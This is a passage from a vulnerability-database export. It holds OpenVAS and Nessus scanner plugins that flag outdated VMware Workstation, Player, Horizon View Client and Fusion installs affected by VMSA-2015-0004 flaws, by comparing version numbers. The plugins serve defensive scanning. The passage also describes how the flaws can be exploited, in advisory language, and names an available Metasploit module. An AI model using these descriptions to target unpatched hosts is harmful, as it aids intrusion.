"http://plugins.openvas.org/nasl.php?oid=1361412562310806760", "type": "openvas", "title": "VMware Workstation Multiple Vulnerabilities May16 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VMware Workstation Multiple Vulnerabilities May16 (Linux)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any 
later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:vmware:workstation\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806760\");\n script_version(\"2019-07-05T09:29:25+0000\");\n script_cve_id(\"CVE-2014-8370\", \"CVE-2015-1043\", \"CVE-2015-1044\", \"CVE-2015-2341\");\n script_bugtraq_id(72338, 72337, 72336, 75094);\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:29:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-05-20 09:35:33 +0530 (Fri, 20 May 2016)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"VMware Workstation Multiple Vulnerabilities May16 (Linux)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with\n VMware Workstation and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to:\n\n - An arbitrary file write issue.\n\n - An input validation issue in the Host Guest File System (HGFS).\n\n - An input validation issue in VMware Authorization process (vmware-authd).\n\n - An input validation issue on an RPC command.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a\n 
attacker for for privilege escalation and to cause Denial of Service.\");\n\n script_tag(name:\"affected\", value:\"VMware Workstation 10.x prior to version\n 10.0.5 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to VMware Workstation version\n 10.0.5 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0001.html\");\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0004.html\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_vmware_prdts_detect_lin.nasl\");\n script_mandatory_keys(\"VMware/Linux/Installed\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!vmwareVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(vmwareVer =~ \"^10\\.\")\n{\n if(version_is_less(version:vmwareVer, test_version:\"10.0.5\"))\n {\n report = report_fixed_ver(installed_version:vmwareVer, fixed_version:\"10.0.5\");\n security_message(data:report );\n exit(0);\n }\n}", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "nessus": [{"lastseen": "2021-01-01T07:00:02", "description": "The version of VMware Horizon View Client installed on the remote host\nis 3.2.x prior to 3.2.1, 3.3.x prior to 3.4.0, or 5.x (with local\nmode) prior to 5.4.2. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An arbitrary code execution vulnerability exists due to\n a stack-based buffer overflow condition in the JPEG2000\n plugin that is triggered when parsing a Quantization\n Default (QCD) marker segment in a JPEG2000 (JP2) image\n file. A remote attacker can exploit this, using a\n specially crafted image, to execute arbitrary code or\n cause a denial of service condition. 
(CVE-2012-0897)\n\n - Multiple denial of service vulnerabilities exist due to\n improper memory allocation by the TPView.dll and\n TPInt.dll libraries. A remote attacker can exploit this\n to cause a denial of service condition. (CVE-2015-2338,\n CVE-2015-2339, CVE-2015-2340)\n\n - Multiple remote code execution vulnerabilities exist due\n to improper memory allocation by the TPView.dll and\n TPInt.dll libraries. A remote attacker can exploit this\n to execute arbitrary code. (CVE-2015-2336,\n CVE-2015-2337)", "edition": 28, "published": "2015-06-12T00:00:00", "title": "VMware Horizon View Client 3.2.x < 3.2.1 / 3.3.x < 3.4.0 / or 5.x < 5.4.2 Multiple Vulnerabilities (VMSA-2015-0004)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2336", "CVE-2015-2338", "CVE-2012-0897", "CVE-2015-2337", "CVE-2015-2340", "CVE-2015-2339"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:vmware:horizon_view_client"], "id": "VMWARE_HORIZON_VIEW_CLIENT_VMSA_2015_0004.NASL", "href": "https://www.tenable.com/plugins/nessus/84150", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84150);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2012-0897\",\n \"CVE-2015-2336\",\n \"CVE-2015-2337\",\n \"CVE-2015-2338\",\n \"CVE-2015-2339\",\n \"CVE-2015-2340\"\n );\n script_bugtraq_id(51426, 75092, 75095);\n script_xref(name:\"VMSA\", value:\"2015-0004\");\n\n script_name(english:\"VMware Horizon View Client 3.2.x < 3.2.1 / 3.3.x < 3.4.0 / or 5.x < 5.4.2 Multiple Vulnerabilities (VMSA-2015-0004)\");\n script_summary(english:\"Checks the VMware Horizon View Client version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtual desktop solution installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Horizon View Client installed on the 
remote host\nis 3.2.x prior to 3.2.1, 3.3.x prior to 3.4.0, or 5.x (with local\nmode) prior to 5.4.2. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An arbitrary code execution vulnerability exists due to\n a stack-based buffer overflow condition in the JPEG2000\n plugin that is triggered when parsing a Quantization\n Default (QCD) marker segment in a JPEG2000 (JP2) image\n file. A remote attacker can exploit this, using a\n specially crafted image, to execute arbitrary code or\n cause a denial of service condition. (CVE-2012-0897)\n\n - Multiple denial of service vulnerabilities exist due to\n improper memory allocation by the TPView.dll and\n TPInt.dll libraries. A remote attacker can exploit this\n to cause a denial of service condition. (CVE-2015-2338,\n CVE-2015-2339, CVE-2015-2340)\n\n - Multiple remote code execution vulnerabilities exist due\n to improper memory allocation by the TPView.dll and\n TPInt.dll libraries. A remote attacker can exploit this\n to execute arbitrary code. 
(CVE-2015-2336,\n CVE-2015-2337)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2015-0004.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware Horizon View Client 3.2.1 / 3.4.0 / 5.4.2 (with\nlocal mode) or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-0897\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Irfanview JPEG2000 jp2 Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:horizon_view_client\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_horizon_view_client_installed.nbin\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/VMware Horizon View Client\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\nappname = 'VMware Horizon View Client';\n\ninstall = get_single_install(app_name:appname, exit_if_unknown_ver:TRUE);\n\nversion = install[\"version\"];\npath = install[\"path\"];\nlocal_mode = install[\"Local Mode\"];\n\nif (local_mode == \"yes\")\n appname += \" (with local mode)\";\n\nport = get_kb_item(\"SMB/transport\");\nif (!port) port = 445;\n\nif (version =~ \"^3\\.2(\\.|$)\")\n fix = \"3.2.1\";\nelse if (version =~ \"^3\\.3(\\.|$)\")\n fix = \"3.4.0\";\nelse if (version =~ \"^5(\\.|$)\" && local_mode == \"yes\")\n fix = \"5.4.2\";\nelse\n audit(AUDIT_INST_PATH_NOT_VULN, appname, version, path);\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n report =\n '\\n Product : ' + appname +\n '\\n Path : ' + path +\n '\\n Installed version : ' + version+\n '\\n Fixed version : ' + fix + '\\n';\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, appname, version, path);\n\nif (report_verbosity > 0) security_warning(port:port, extra:report);\nelse security_warning(port);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T07:00:05", "description": "The version of VMware Player installed on the remote Windows host is\n7.x prior to 7.1.1. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An arbitrary code execution vulnerability exists due to\n a stack-based buffer overflow condition in the JPEG2000\n plugin that is triggered when parsing a Quantization\n Default (QCD) marker segment in a JPEG2000 (JP2) image\n file. 
A remote attacker can exploit this, using a\n specially crafted image, to execute arbitrary code or\n cause a denial of service condition. (CVE-2012-0897)\n\n - Multiple unspecified remote code execution\n vulnerabilities exists in 'TPView.dll' and 'TPInt.dll'\n library files. (CVE-2015-2336, CVE-2015-2337)\n\n - The 'TPview.dll' and 'TPInt.dll' library files fail to\n properly handle memory allocation. A remote attacker can\n exploit this to cause a denial of service.\n (CVE-2015-2338, CVE-2015-2339, CVE-2015-2340)", "edition": 25, "published": "2015-06-16T00:00:00", "title": "VMware Player 7.x < 7.1.1 Multiple Vulnerabilities (VMSA-2015-0004)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2336", "CVE-2015-2338", "CVE-2012-0897", "CVE-2015-2337", "CVE-2015-2340", "CVE-2015-2339"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:vmware:player"], "id": "VMWARE_PLAYER_7_1_1_VMSA_2015-0004.NASL", "href": "https://www.tenable.com/plugins/nessus/84220", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84220);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/08/06 14:03:16\");\n\n script_cve_id(\n \"CVE-2012-0897\",\n \"CVE-2015-2336\",\n \"CVE-2015-2337\",\n \"CVE-2015-2338\",\n \"CVE-2015-2339\",\n \"CVE-2015-2340\"\n );\n script_bugtraq_id(51426, 75092, 75095);\n script_xref(name:\"VMSA\", value:\"2015-0004\");\n\n script_name(english:\"VMware Player 7.x < 7.1.1 Multiple Vulnerabilities (VMSA-2015-0004)\");\n script_summary(english:\"Checks the VMware Player version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtualization application installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Player installed on the remote Windows host is\n7.x prior to 7.1.1. 
It is, therefore, affected by multiple\nvulnerabilities :\n\n - An arbitrary code execution vulnerability exists due to\n a stack-based buffer overflow condition in the JPEG2000\n plugin that is triggered when parsing a Quantization\n Default (QCD) marker segment in a JPEG2000 (JP2) image\n file. A remote attacker can exploit this, using a\n specially crafted image, to execute arbitrary code or\n cause a denial of service condition. (CVE-2012-0897)\n\n - Multiple unspecified remote code execution\n vulnerabilities exists in 'TPView.dll' and 'TPInt.dll'\n library files. (CVE-2015-2336, CVE-2015-2337)\n\n - The 'TPview.dll' and 'TPInt.dll' library files fail to\n properly handle memory allocation. A remote attacker can\n exploit this to cause a denial of service.\n (CVE-2015-2338, CVE-2015-2339, CVE-2015-2340)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0004.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to VMware Player version 7.1.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Irfanview JPEG2000 jp2 Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:vmware:player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"vmware_player_detect.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"VMware/Player/Path\", \"VMware/Player/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\nversion = get_kb_item_or_exit(\"VMware/Player/Version\");\npath = get_kb_item_or_exit(\"VMware/Player/Path\");\n\nfixed = '7.1.1';\nif (\n version =~ \"^7\\.\" &&\n ver_compare(ver:version, fix:fixed, strict:FALSE) == -1\n)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report +=\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"VMware Player\", version, path);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T07:00:23", "description": "The version of VMware Workstation installed on the remote Windows host\nis 10.x prior to 10.0.6 or 11.x prior to 11.1.1. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An arbitrary code execution vulnerability exists due to\n a stack-based buffer overflow condition in the JPEG2000\n plugin that is triggered when parsing a Quantization\n Default (QCD) marker segment in a JPEG2000 (JP2) image\n file. A remote attacker can exploit this, using a\n specially crafted image, to execute arbitrary code or\n cause a denial of service condition. (CVE-2012-0897)\n\n - Multiple unspecified remote code execution\n vulnerabilities exists in 'TPView.dll' and 'TPInt.dll'\n library files. 
(CVE-2015-2336, CVE-2015-2337)\n\n - The 'TPview.dll' and 'TPInt.dll' library files fail to\n properly handle memory allocation. A remote attacker can\n exploit this to cause a denial of service.\n (CVE-2015-2338, CVE-2015-2339, CVE-2015-2340)", "edition": 25, "published": "2015-06-16T00:00:00", "title": "VMware Workstation 10.x < 10.0.6 / 11.x < 11.1.1 Multiple Vulnerabilities (VMSA-2015-0004) (Windows)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2336", "CVE-2015-2338", "CVE-2012-0897", "CVE-2015-2337", "CVE-2015-2340", "CVE-2015-2339"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:vmware:workstation"], "id": "VMWARE_WORKSTATION_MULTIPLE_VMSA_2015_0004.NASL", "href": "https://www.tenable.com/plugins/nessus/84223", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84223);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/08/06 14:03:16\");\n\n script_cve_id(\n \"CVE-2012-0897\",\n \"CVE-2015-2336\",\n \"CVE-2015-2337\",\n \"CVE-2015-2338\",\n \"CVE-2015-2339\",\n \"CVE-2015-2340\"\n );\n script_bugtraq_id(51426, 75092, 75095);\n script_xref(name:\"VMSA\", value:\"2015-0004\");\n\n script_name(english:\"VMware Workstation 10.x < 10.0.6 / 11.x < 11.1.1 Multiple Vulnerabilities (VMSA-2015-0004) (Windows)\");\n script_summary(english:\"Checks the VMware Workstation version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtualization application installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Workstation installed on the remote Windows host\nis 10.x prior to 10.0.6 or 11.x prior to 11.1.1. 
It is, therefore,\naffected by multiple vulnerabilities :\n\n - An arbitrary code execution vulnerability exists due to\n a stack-based buffer overflow condition in the JPEG2000\n plugin that is triggered when parsing a Quantization\n Default (QCD) marker segment in a JPEG2000 (JP2) image\n file. A remote attacker can exploit this, using a\n specially crafted image, to execute arbitrary code or\n cause a denial of service condition. (CVE-2012-0897)\n\n - Multiple unspecified remote code execution\n vulnerabilities exists in 'TPView.dll' and 'TPInt.dll'\n library files. (CVE-2015-2336, CVE-2015-2337)\n\n - The 'TPview.dll' and 'TPInt.dll' library files fail to\n properly handle memory allocation. A remote attacker can\n exploit this to cause a denial of service.\n (CVE-2015-2338, CVE-2015-2339, CVE-2015-2340)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0004.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to VMware Workstation version 10.0.6 / 11.1.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Irfanview JPEG2000 jp2 Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:workstation\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"vmware_workstation_detect.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"VMware/Workstation/Version\", \"VMware/Workstation/Path\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\nappname = 'VMware Workstation';\n\nversion = get_kb_item(\"VMware/Workstation/Version\");\nif (isnull(version)) audit(AUDIT_NOT_INST, appname);\n\npath = get_kb_item_or_exit(\"VMware/Workstation/Path\");\n\nfix = NULL;\nif (version =~ \"^10\\.\" && ver_compare(ver:version, fix:\"10.0.6\", strict:FALSE) == -1)\n fix = \"10.0.6\";\nelse if (version =~ \"^11\\.\" && ver_compare(ver:version, fix:\"11.1.1\", strict:FALSE) == -1)\n fix = \"11.1.1\";\n\nif(fix)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity >0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix + '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, appname, version, path);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-22T10:55:14", "description": "The version of VMware Workstation installed on the remote Linux host\nis 10.x prior to 10.0.6. It is, therefore, affected by a denial of\nservice vulnerability due to improper validation of user-supplied\ninput to a remote procedure call (RPC) command. 
An unauthenticated,\nremote attacker can exploit this, via a crafted command, to crash the\nhost or guest operating systems.", "edition": 21, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2015-06-16T00:00:00", "title": "VMware Workstation 10.x < 10.0.6 RPC Command DoS (VMSA-2015-0004) (Linux)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2341"], "modified": "2015-06-16T00:00:00", "cpe": ["cpe:/a:vmware:workstation"], "id": "VMWARE_WORKSTATION_LINUX_10_0_6.NASL", "href": "https://www.tenable.com/plugins/nessus/84222", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84222);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/21\");\n\n script_cve_id(\"CVE-2015-2341\");\n script_bugtraq_id(75094);\n script_xref(name:\"VMSA\", value:\"2015-0004\");\n\n script_name(english:\"VMware Workstation 10.x < 10.0.6 RPC Command DoS (VMSA-2015-0004) (Linux)\");\n script_summary(english:\"Checks the VMware Workstation version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtualization application installed that is\naffected by a denial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Workstation installed on the remote Linux host\nis 10.x prior to 10.0.6. It is, therefore, affected by a denial of\nservice vulnerability due to improper validation of user-supplied\ninput to a remote procedure call (RPC) command. 
An unauthenticated,\nremote attacker can exploit this, via a crafted command, to crash the\nhost or guest operating systems.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0004.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to VMware Workstation version 10.0.6 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-2341\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:workstation\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2020 Tenable Network Security, Inc.\");\n script_family(english:\"General\");\n\n script_dependencies(\"vmware_workstation_linux_installed.nbin\");\n script_require_keys(\"Host/uname\", \"Host/VMware Workstation/Version\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (\"linux\" >!< tolower(get_kb_item(\"Host/uname\")))\n audit(AUDIT_OS_NOT, \"Linux\");\n\nversion = get_kb_item_or_exit(\"Host/VMware Workstation/Version\");\n\nfixed = \"10.0.6\";\nif (version =~ \"^10\\.\" && ver_compare(ver:version, 
fix:fixed, strict:FALSE) == -1)\n{\n report +=\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed +\n '\\n';\n security_report_v4(port:0, extra:report, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"VMware Workstation\", version);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-01T03:30:03", "description": "The version of VMware Fusion installed on the remote Mac OS X host is\nversion 6.x prior to 6.0.6 or 7.x prior to 7.0.1. It is, therefore,\naffected by a denial of service vulnerability due to improper\nvalidation of user-supplied input to a remote procedure call (RPC)\ncommand. An unauthenticated, remote attacker can exploit this, via a\ncrafted command, to crash the host or guest operating systems.", "edition": 24, "published": "2015-06-16T00:00:00", "title": "VMware Fusion 6.x < 6.0.6 / 7.x < 7.0.1 RPC Command DoS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2341"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:vmware:fusion"], "id": "MACOSX_FUSION_7_0_1.NASL", "href": "https://www.tenable.com/plugins/nessus/84218", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84218);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\"CVE-2015-2341\");\n script_bugtraq_id(75094);\n script_xref(name:\"VMSA\", value:\"2015-0004\");\n\n script_name(english:\"VMware Fusion 6.x < 6.0.6 / 7.x < 7.0.1 RPC Command DoS\");\n script_summary(english:\"Checks the VMware Fusion version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A VMware product installed on the remote host is affected by a denial\nof service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Fusion installed on the remote Mac OS X host is\nversion 6.x prior to 6.0.6 or 7.x prior to 7.0.1. 
It is, therefore,\naffected by a denial of service vulnerability due to improper\nvalidation of user-supplied input to a remote procedure call (RPC)\ncommand. An unauthenticated, remote attacker can exploit this, via a\ncrafted command, to crash the host or guest operating systems.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0004.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to VMware Fusion version 6.0.6 / 7.0.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:fusion\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_fusion_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"MacOSX/Fusion/Version\", \"MacOSX/Fusion/Path\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"Host/local_checks_enabled\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Fusion/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Fusion/Path\");\n\nfix = 
